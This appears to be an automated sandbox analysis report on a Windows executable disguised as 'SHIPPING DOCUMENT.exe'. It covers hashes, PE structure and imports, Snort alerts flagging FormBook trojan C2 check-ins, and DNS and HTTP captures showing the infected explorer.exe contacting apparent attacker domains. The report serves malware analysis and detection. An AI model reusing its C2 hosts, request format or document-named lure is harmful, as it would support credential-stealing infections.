                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:SHIPPING DOCUMENT.exe
                                          File size:233957
                                          MD5:25e847b9631bc2fe8d87fe4278fa142e
                                          SHA1:641756a84fdce68e101a53cfa6809b68190b7ad7
                                          SHA256:70dfd7bc81878d265e39803f73f55af96d7bf2a336408b52cc6005785fbe0415
                                          SHA512:82c1e56fa6a6611c45057c80190d2d7d220294a690044a164cdda39bc5e26b8c35d76433e3b1d7d247ef464d3307911a4a4337e52163177f4322fbe67579dabd
                                          SSDEEP:6144:lPXZ+Qpc3dgPKMqFsSa94wwuYc3ZqiU5OPiNCPEXH:T+Qpc3dg4GS+4w5YcxiXH
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x403461
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+18h], ebx
                                          mov dword ptr [esp+10h], 0040A130h
                                          mov dword ptr [esp+20h], ebx
                                          mov byte ptr [esp+14h], 00000020h
                                          call dword ptr [004080B0h]
                                          call dword ptr [004080C0h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [0042474Ch], eax
                                          je 00007F38E0BFA453h
                                          push ebx
                                          call 00007F38E0BFD5CEh
                                          cmp eax, ebx
                                          je 00007F38E0BFA449h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082A0h
                                          push esi
                                          call 00007F38E0BFD54Ah
                                          push esi
                                          call dword ptr [004080B8h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F38E0BFA42Dh
                                          push 0000000Bh
                                          call 00007F38E0BFD5A2h
                                          push 00000009h
                                          call 00007F38E0BFD59Bh
                                          push 00000007h
                                          mov dword ptr [00424744h], eax
                                          call 00007F38E0BFD58Fh
                                          cmp eax, ebx
                                          je 00007F38E0BFA451h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007F38E0BFA449h
                                          or byte ptr [0042474Fh], 00000040h
                                          push ebp
                                          call dword ptr [00408038h]
                                          push ebx
                                          call dword ptr [00408288h]
                                          mov dword ptr [00424818h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041FD10h
                                          call dword ptr [0040816Ch]
                                          push 0040A1ECh

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xa50.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x623c0x6400False0.65859375data6.40257705324IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x12740x1400False0.43359375data5.05749598324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x1a8580x600False0.445963541667data4.08975001509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x2d0000xa500xc00False0.402994791667data4.1909607241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x2d1900x2e8dataEnglishUnited States
                                          RT_DIALOG0x2d4780x100dataEnglishUnited States
                                          RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                          RT_DIALOG0x2d6980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                          RT_MANIFEST0x2d7100x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                          SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                          ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                          USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          05/04/21-20:11:56.504622TCP1201ATTACK-RESPONSES 403 Forbidden804976234.102.136.180192.168.2.4
                                          05/04/21-20:12:37.590909TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4154.220.41.208
                                          05/04/21-20:12:37.590909TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4154.220.41.208
                                          05/04/21-20:12:37.590909TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4154.220.41.208

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 4, 2021 20:11:36.430535078 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:36.721960068 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:36.722122908 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:36.722306013 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:37.016350031 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016379118 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016396999 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016410112 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016422033 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016550064 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:37.016580105 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:37.309417009 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:56.325994015 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.367203951 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:11:56.367348909 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.367537022 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.408456087 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:11:56.504621983 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:11:56.504673958 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:11:56.504898071 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.504939079 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.545893908 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:12:16.770282984 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.815764904 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:16.815901041 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.816143990 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.861567974 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:16.892096996 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:16.892129898 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:16.892287016 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.892380953 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.937747002 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:37.285511017 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:37.590425968 CEST8049766154.220.41.208192.168.2.4
                                          May 4, 2021 20:12:37.590872049 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:37.590909004 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:37.893582106 CEST8049766154.220.41.208192.168.2.4
                                          May 4, 2021 20:12:37.898349047 CEST8049766154.220.41.208192.168.2.4
                                          May 4, 2021 20:12:37.898365021 CEST8049766154.220.41.208192.168.2.4
                                          May 4, 2021 20:12:37.898538113 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:37.898602962 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:38.204751968 CEST8049766154.220.41.208192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 4, 2021 20:10:23.100471973 CEST6464653192.168.2.48.8.8.8
                                          May 4, 2021 20:10:23.172450066 CEST53646468.8.8.8192.168.2.4
                                          May 4, 2021 20:10:24.091864109 CEST6529853192.168.2.48.8.8.8
                                          May 4, 2021 20:10:24.140894890 CEST53652988.8.8.8192.168.2.4
                                          May 4, 2021 20:10:25.898332119 CEST5912353192.168.2.48.8.8.8
                                          May 4, 2021 20:10:25.950277090 CEST53591238.8.8.8192.168.2.4
                                          May 4, 2021 20:10:26.661243916 CEST5453153192.168.2.48.8.8.8
                                          May 4, 2021 20:10:26.709969997 CEST53545318.8.8.8192.168.2.4
                                          May 4, 2021 20:10:28.094921112 CEST4971453192.168.2.48.8.8.8
                                          May 4, 2021 20:10:28.144993067 CEST53497148.8.8.8192.168.2.4
                                          May 4, 2021 20:10:28.895927906 CEST5802853192.168.2.48.8.8.8
                                          May 4, 2021 20:10:28.944466114 CEST53580288.8.8.8192.168.2.4
                                          May 4, 2021 20:10:29.856165886 CEST5309753192.168.2.48.8.8.8
                                          May 4, 2021 20:10:29.915005922 CEST53530978.8.8.8192.168.2.4
                                          May 4, 2021 20:10:29.961313009 CEST4925753192.168.2.48.8.8.8
                                          May 4, 2021 20:10:30.012523890 CEST53492578.8.8.8192.168.2.4
                                          May 4, 2021 20:10:31.803365946 CEST6238953192.168.2.48.8.8.8
                                          May 4, 2021 20:10:31.853471994 CEST53623898.8.8.8192.168.2.4
                                          May 4, 2021 20:10:32.708785057 CEST4991053192.168.2.48.8.8.8
                                          May 4, 2021 20:10:32.760482073 CEST53499108.8.8.8192.168.2.4
                                          May 4, 2021 20:10:33.501606941 CEST5585453192.168.2.48.8.8.8
                                          May 4, 2021 20:10:33.554955959 CEST53558548.8.8.8192.168.2.4
                                          May 4, 2021 20:10:34.857012033 CEST6454953192.168.2.48.8.8.8
                                          May 4, 2021 20:10:34.905607939 CEST53645498.8.8.8192.168.2.4
                                          May 4, 2021 20:10:35.967181921 CEST6315353192.168.2.48.8.8.8
                                          May 4, 2021 20:10:36.015979052 CEST53631538.8.8.8192.168.2.4
                                          May 4, 2021 20:10:36.764503956 CEST5299153192.168.2.48.8.8.8
                                          May 4, 2021 20:10:36.818133116 CEST53529918.8.8.8192.168.2.4
                                          May 4, 2021 20:10:37.895534992 CEST5370053192.168.2.48.8.8.8
                                          May 4, 2021 20:10:37.944308043 CEST53537008.8.8.8192.168.2.4
                                          May 4, 2021 20:10:38.794277906 CEST5172653192.168.2.48.8.8.8
                                          May 4, 2021 20:10:38.845922947 CEST53517268.8.8.8192.168.2.4
                                          May 4, 2021 20:10:39.904228926 CEST5679453192.168.2.48.8.8.8
                                          May 4, 2021 20:10:39.953146935 CEST53567948.8.8.8192.168.2.4
                                          May 4, 2021 20:10:41.021723032 CEST5653453192.168.2.48.8.8.8
                                          May 4, 2021 20:10:41.070427895 CEST53565348.8.8.8192.168.2.4
                                          May 4, 2021 20:10:42.201668024 CEST5662753192.168.2.48.8.8.8
                                          May 4, 2021 20:10:42.266638041 CEST53566278.8.8.8192.168.2.4
                                          May 4, 2021 20:10:43.036648035 CEST5662153192.168.2.48.8.8.8
                                          May 4, 2021 20:10:43.098949909 CEST53566218.8.8.8192.168.2.4
                                          May 4, 2021 20:10:44.497061014 CEST6311653192.168.2.48.8.8.8
                                          May 4, 2021 20:10:44.547878027 CEST53631168.8.8.8192.168.2.4
                                          May 4, 2021 20:10:45.598361969 CEST6407853192.168.2.48.8.8.8
                                          May 4, 2021 20:10:45.648258924 CEST53640788.8.8.8192.168.2.4
                                          May 4, 2021 20:10:46.404876947 CEST6480153192.168.2.48.8.8.8
                                          May 4, 2021 20:10:46.464987993 CEST53648018.8.8.8192.168.2.4
                                          May 4, 2021 20:11:02.089152098 CEST6172153192.168.2.48.8.8.8
                                          May 4, 2021 20:11:02.141515970 CEST53617218.8.8.8192.168.2.4
                                          May 4, 2021 20:11:12.937578917 CEST5125553192.168.2.48.8.8.8
                                          May 4, 2021 20:11:13.000139952 CEST53512558.8.8.8192.168.2.4
                                          May 4, 2021 20:11:17.360085011 CEST6152253192.168.2.48.8.8.8
                                          May 4, 2021 20:11:17.419871092 CEST53615228.8.8.8192.168.2.4
                                          May 4, 2021 20:11:29.710856915 CEST5233753192.168.2.48.8.8.8
                                          May 4, 2021 20:11:29.845668077 CEST53523378.8.8.8192.168.2.4
                                          May 4, 2021 20:11:30.667967081 CEST5504653192.168.2.48.8.8.8
                                          May 4, 2021 20:11:30.773550034 CEST53550468.8.8.8192.168.2.4
                                          May 4, 2021 20:11:31.398775101 CEST4961253192.168.2.48.8.8.8
                                          May 4, 2021 20:11:31.468777895 CEST53496128.8.8.8192.168.2.4
                                          May 4, 2021 20:11:31.779844999 CEST4928553192.168.2.48.8.8.8
                                          May 4, 2021 20:11:31.832775116 CEST53492858.8.8.8192.168.2.4
                                          May 4, 2021 20:11:31.926997900 CEST5060153192.168.2.48.8.8.8
                                          May 4, 2021 20:11:31.987099886 CEST53506018.8.8.8192.168.2.4
                                          May 4, 2021 20:11:32.563543081 CEST6087553192.168.2.48.8.8.8
                                          May 4, 2021 20:11:32.625091076 CEST53608758.8.8.8192.168.2.4
                                          May 4, 2021 20:11:33.563436031 CEST5644853192.168.2.48.8.8.8
                                          May 4, 2021 20:11:33.626952887 CEST53564488.8.8.8192.168.2.4
                                          May 4, 2021 20:11:34.135477066 CEST5917253192.168.2.48.8.8.8
                                          May 4, 2021 20:11:34.193928957 CEST53591728.8.8.8192.168.2.4
                                          May 4, 2021 20:11:35.226448059 CEST6242053192.168.2.48.8.8.8
                                          May 4, 2021 20:11:35.283691883 CEST53624208.8.8.8192.168.2.4
                                          May 4, 2021 20:11:36.049501896 CEST6057953192.168.2.48.8.8.8
                                          May 4, 2021 20:11:36.224613905 CEST5018353192.168.2.48.8.8.8
                                          May 4, 2021 20:11:36.424552917 CEST53605798.8.8.8192.168.2.4
                                          May 4, 2021 20:11:36.503490925 CEST53501838.8.8.8192.168.2.4
                                          May 4, 2021 20:11:37.042174101 CEST6153153192.168.2.48.8.8.8
                                          May 4, 2021 20:11:37.105658054 CEST53615318.8.8.8192.168.2.4
                                          May 4, 2021 20:11:40.637680054 CEST4922853192.168.2.48.8.8.8
                                          May 4, 2021 20:11:40.696042061 CEST53492288.8.8.8192.168.2.4
                                          May 4, 2021 20:11:56.263324976 CEST5979453192.168.2.48.8.8.8
                                          May 4, 2021 20:11:56.324739933 CEST53597948.8.8.8192.168.2.4
                                          May 4, 2021 20:12:11.693784952 CEST5591653192.168.2.48.8.8.8
                                          May 4, 2021 20:12:11.742496014 CEST53559168.8.8.8192.168.2.4
                                          May 4, 2021 20:12:13.384565115 CEST5275253192.168.2.48.8.8.8
                                          May 4, 2021 20:12:13.452053070 CEST53527528.8.8.8192.168.2.4
                                          May 4, 2021 20:12:16.698889017 CEST6054253192.168.2.48.8.8.8
                                          May 4, 2021 20:12:16.768903971 CEST53605428.8.8.8192.168.2.4
                                          May 4, 2021 20:12:37.072877884 CEST6068953192.168.2.48.8.8.8
                                          May 4, 2021 20:12:37.284445047 CEST53606898.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          May 4, 2021 20:11:36.049501896 CEST192.168.2.48.8.8.80x7501Standard query (0)www.barkinlot.comA (IP address)IN (0x0001)
                                          May 4, 2021 20:11:56.263324976 CEST192.168.2.48.8.8.80xd8c7Standard query (0)www.buyruon.comA (IP address)IN (0x0001)
                                          May 4, 2021 20:12:16.698889017 CEST192.168.2.48.8.8.80xfab8Standard query (0)www.fuerzaagavera.comA (IP address)IN (0x0001)
                                          May 4, 2021 20:12:37.072877884 CEST192.168.2.48.8.8.80xce44Standard query (0)www.union-green.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          May 4, 2021 20:11:36.424552917 CEST8.8.8.8192.168.2.40x7501No error (0)www.barkinlot.com107.151.79.234A (IP address)IN (0x0001)
                                          May 4, 2021 20:11:56.324739933 CEST8.8.8.8192.168.2.40xd8c7No error (0)www.buyruon.combuyruon.comCNAME (Canonical name)IN (0x0001)
                                          May 4, 2021 20:11:56.324739933 CEST8.8.8.8192.168.2.40xd8c7No error (0)buyruon.com34.102.136.180A (IP address)IN (0x0001)
                                          May 4, 2021 20:12:16.768903971 CEST8.8.8.8192.168.2.40xfab8No error (0)www.fuerzaagavera.com64.190.62.111A (IP address)IN (0x0001)
                                          May 4, 2021 20:12:37.284445047 CEST8.8.8.8192.168.2.40xce44No error (0)www.union-green.com154.220.41.208A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.barkinlot.com
                                          • www.buyruon.com
                                          • www.fuerzaagavera.com
                                          • www.union-green.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.449754107.151.79.23480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          May 4, 2021 20:11:36.722306013 CEST2080OUTGET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.barkinlot.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 4, 2021 20:11:37.016350031 CEST2123INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 04 May 2021 18:11:41 GMT
                                          Content-Type: text/html
                                          Content-Length: 4372
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 47 42 4b 22 3e 0d 0a 3c 74 69 74 6c 65 3e b9 fa 7c bc ca 7c b2 a9 7c b2 ca 7c bc e0 7c b6 bd 7c ce af 7c d4 b1 7c bb e1 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 73 74 79 6c 65 3e 2e 69 65 38 20 2e 61 6c 65 72 74 2d 63 69 72 63 6c 65 2c 2e 69 65 38 20 2e 61 6c 65 72 74 2d 66 6f 6f 74 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 69 65 38 20 2e 61 6c 65 72 74 2d 62 6f 78 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 37 35 70 78 7d 2e 69 65 38 20 2e 61 6c 65 72 74 2d 73 65 63 2d 74 65 78 74 7b 74 6f 70 3a 34 35 70 78 7d 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 36 45 41 45 42 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 27 ce a2 c8 ed d1 c5 ba da 27 2c 27 cb ce cc e5 27 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 61 6c 65 72 74 2d 62 6f 78 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 39 36 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 31 38 30 70 78 20 38 35 70 78 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 20 31 30 70 78 20 30 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 35 70 78 20 39 70 78 20 31 37 70 78 20 72 67 62 61 28 31 30 32 2c 31 30 32 2c 31 30 32 2c 30 2e 37 35 29 3b 77 69 64 74 68 3a 32 38 36 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 61 6c 65 72 74 2d 62 6f 78 20 70 7b 6d 61 72 67 69 6e 3a 30 7d 2e 61 6c 65 72 74 2d 63 69 72 63 6c 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 35 30 70 78 3b 6c 65 66 74 3a 31 31 31 70 78 7d 2e 61 6c 65 72 74 2d 73 65 63 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 37 33 35 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 20 31 73 20 6c 69 6e 65 61 72 7d 2e 61 6c 65 72 74 2d 73 65 63 2d 74 65 78 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 31 70 78 3b 6c 65 66 74 3a 31 39 30 70 78 3b 77 69 64 74 68 3a 37 36 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 38 70 78 7d 2e 61 6c 65 72 74 2d 73 65 63 2d 75 6e 69 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 7d 2e 61 6c 65 72 74 2d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 33 35 70 78 20 30 7d 2e 61 6c 65 72 74 2d 68 65 61 64 7b 63 6f 6c 6f 72 3a 23 32 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 7d 2e 61 6c 65 72 74 2d 63 6f 6e 63 65 6e 74 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 30 20 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 37 42 37 42 37 42 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 61 6c 65 72 74 2d 63 6f 6e 63 65 6e 74 20 70 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 61 6c 65 72 74 2d 62 74 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 41 42 30 46 37 3b 68 65 69 67 68 74 3a 35 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 35 70 78 3b 77 69 64 74 68 3a 32 38 36 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74
